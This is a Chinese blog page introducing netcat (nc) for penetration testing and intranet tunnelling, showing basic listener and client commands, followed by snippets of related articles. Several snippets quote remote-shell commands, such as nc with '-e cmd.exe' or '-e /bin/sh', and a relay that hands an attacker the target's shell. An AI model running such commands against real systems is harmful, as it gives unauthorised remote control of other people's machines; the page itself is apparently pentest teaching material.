内网穿透(nc)

已于 2022-09-11 08:49:39 修改
阅读量3.6k 收藏 4
点赞数 3
分类专栏: 优秀文章 秀秀 文章标签: 服务器 linux 网络
于 2022-06-28 22:54:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52549196/article/details/125509276
版权

文章目录

内网穿透技术(nc)

Netcat常称为 nc,拥有“瑞士军刀”的美誉。

nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,
能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具
,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,
它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell

聊天

通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。

  • 服务器端:
nc   -lvp    8888

监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

  • 客户端:
nc  -nv  192.168.100.140
了解本专栏 订阅专栏 解锁全文
渗透测试6---神器nc,frp内网穿透,window下的netsh端口转发,window下的内网穿透工具lcx
初遇我ㄖ寸の热情呢?
04-14 8962
nc/netcat/ncat简史 nc是代理转发的神奇 nc被誉为网络安全界的瑞士军刀,端口扫描工具,也是一款安全工具,还能是一款监测工具,通过使用TCP或UDP协议的网络连接去读写数据 nc的版本非常乱,有很多版本。 传统版本:(有扫描功能,现代版本没有) netcat-traditional : Kali Linux默认的版本,命令为nc或netcat netcat-openbs...
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2889
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
Nc内网穿透
qq_54713392的博客
06-10 555
Nc内网穿透 攻击机 ip 192.168.32.122 执行nc -lvp 3333 目标机 ip 192.168.1.5 执行nc -lvp 3333 -e c:\windows\system32\cmd.exe 中间机 ip 192.168.32.128 192.168.1.3 执行 nc -v 192.168.32.122 3333 -e “nc -v 192.168.1.5 3333” 在攻击机查看结果,已经拿到了目标机的shell ...
内网穿透工具 -- nc
Python_paipai的博客
04-27 313
nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell。
内网代理穿透1:nc代理穿透
da_chuan_chuan的博客
01-10 8328
文章目录前言一、nc的基本使用二、nc传文件三 、反弹shell总结 前言 nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。可以用来反弹shell、传输文件、端口扫描等。写这边博客主要是记录这个工具的用法,以免后面忘记。 一、nc的基本使用 nc可以作为服务端启动一个tcp监听,默认情况下是监听的一个tcp的端口,如: nc.exe -l -p 9999 客户端测试: 1、服务端建立监听之后,客户端只需要启动nc程序连接对应的IP和端口就
内网安全-内网穿透
分享
02-11 6072
内网穿透的简单介绍!工具介绍!
内网穿透从搭建到溯源(内网隧道搭建、绕过、隧道流量分析、日志分析、隧道防护)
墨痕诉清风的博客
02-24 4677
背景 在攻防博弈这个永久的话题中,永远不会缺少一个重要角色即内网穿透。当渗透测试人员在进入内网,需要扩大战果的时候,往往会遇到内网的一些防护策略,不外乎边界设备、防火墙及入侵检测设备对端口或者数据包的拦截,导致流量无法出网,此时就需要熟练掌握内网穿透技术,从复杂的内网环境中获取稳定的流量交互,从而达到目的。 本文针对边界安全设备等对内网端口的屏蔽及数据包的拦截,从不同的网络协议层进行搭建隧道进行绕过,并对不同类型的隧道流量或者日志进行分析,帮助攻击或防守人员从溯源的维度更好的掌握内网穿透技术。 .
frp点对点udp方式内网穿透ssh,不走服务器流量
热门推荐
08-03 1万+
frp点对点udp方式内网穿透ssh,不走服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29 日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019 年 5 月 25 日) frp内网穿透...
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1824
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
NC渗透测试
Letter_
05-10 1647
参考: http://www.freebuf.com/articles/system/10632.html http://www.waitalone.cn/linux-shell-rebound-under-way.html https://docs.python.org/2/py-modindex.html 大家在做渗透测试的时候,遇到linux服务器,想反弹shell
端口转发netcat(nc
02-12
端口转发工具 内网渗透 netcat(nc) 端口转发工具 内网渗透 netcat(nc
nc.exe 监听端口转发端口
02-25
NC监听软件,转发端口,适合windows平台,利器!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
渗透神器系列】nc
lansefly1990的专栏
12-21 1164
【渗透神器系列】nc 发表于 2017-04-10   |   分类于 安全工具   |   热度 3125 ℃   工欲善其事,必先利其器   从事渗透测试工作几年了,在做项目过程中发现良好的渗透技术固然重要,但欲测试出更多的结果,离不开强大的工具。即使是能力超强的大牛,我想也不可能完全手工做渗透,毕竟渗透测试还是个体力活。   现在有些人认为渗透测试越来越简单了,因为开源的自动化工具...
内网穿透(Intranet Penetration)
qq_35598561的博客
06-01 921
内网穿透(Intranet Penetration)
渗透测试工具-瑞士军刀NC
aming小老弟
01-15 9054
NC: netcat 一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听 可作为server 以TCP或UDP方式侦听指定端口 (2)端口的扫描 nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 控制参数 -l 指定nc将处于侦听模式,被当作server 侦听并接受连接,而非向其它地址发起连接。 -p 暂未用到(老版本的nc可能需要在端口号前加-p参数) -s 指定发送数据的源IP地址,适用于多网卡机 -u 指定nc使用U
使用nc 实现ssh 公网控制内网
gtinlian的博客
05-10 1882
安装nc yum -y install nc nc -l -p 555 #再公网服务器上监听 nc {host}:{port} -e /bib/sh #{host} 公网服务器ip :{port} 公网服务器端口
DuplexPipe二三事(三)——网络中转站:端口映射
子清行
09-04 3854
端口映射在《DuplexPipe二三事(二)》中介绍了瑞士军刀 nc 的用法:nc 就像给程序一张飞机票,让原本只能在本地执行的程序也能运行在网络上!但网络和现实交通一样,很多地方需要中转才能到达(比如外网计算机无法直接访问公司内部 Web 服务器)。为实现公网对内部网络的访问,需要对数据进行转发(即端口映射)。比如内网“主机A”开启了 Web(port 80)服务,需要在“服务器的网关”
局域网内利用nc传输文件
zileqide的专栏
08-01 854
操作系统:ubuntu; 操作方式:命令行; 接收端:nc -l -p port > filename 发送端:nc destination_ip destination_port 实例: 接收端:nc -l -p 10000 > test.txt 发送端:nc 192.168.0.105 10000 注意事项:先接收端操作,接收端监听后,发送
红蓝对抗下的内网穿透技术详解
最新发布
lurenjia404的博客
06-29 2150
随着隧道技术的不断更新迭代,越来越多的攻击者利用隧道技术攻击企业内网,通过本篇文章从多维度分析隧道隐蔽技术的划分及对隧道技术整体来讲解,其中包含基础知识概括和相关隧道工具的利用方式及隧道隐蔽技术的检测防护方法,并且通过大量的案例来演示了多个实际常见的隧道场景,比如我们通过拿到系统权限后利用多个协议实现隧道穿透、端口转发、内网穿透,总之,希望本篇内容对读者有所帮助。
docker nginx ssh 内网穿透
05-09
要在 Docker 容器中运行 Nginx 并使用 SSH 进行内网穿透,可以采用以下步骤: 1. 在 Docker 中运行 Nginx 可以使用以下命令来运行一个 Nginx 容器: ``` docker run -d --name nginx -p 80:80 nginx ``` 这将在 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值